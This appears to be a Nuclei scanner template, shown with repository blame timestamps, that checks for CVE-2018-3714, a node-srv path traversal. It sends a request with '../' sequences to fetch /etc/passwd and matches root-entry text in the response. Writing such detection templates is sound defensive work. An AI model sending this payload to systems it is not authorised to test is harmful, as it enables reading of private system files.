2020-07-05 15:49:09 +00:00
|
|
|
id: CVE-2018-3714
|
|
|
|
info:
|
|
|
|
name: node-srv Path Traversal
|
|
|
|
author: madrobot
|
|
|
|
severity: high
|
|
|
|
|
|
|
|
requests:
|
|
|
|
- method: GET
|
|
|
|
path:
|
|
|
|
- "{{BaseURL}}/node_modules/../../../../../etc/passwd"
|
2020-07-08 11:38:57 +00:00
|
|
|
matchers-condition: and
|
2020-07-05 15:49:09 +00:00
|
|
|
matchers:
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|
|
|
|
- type: regex
|
|
|
|
regex:
|
|
|
|
- "root:[x*]:0:0:"
|
|
|
|
part: body
|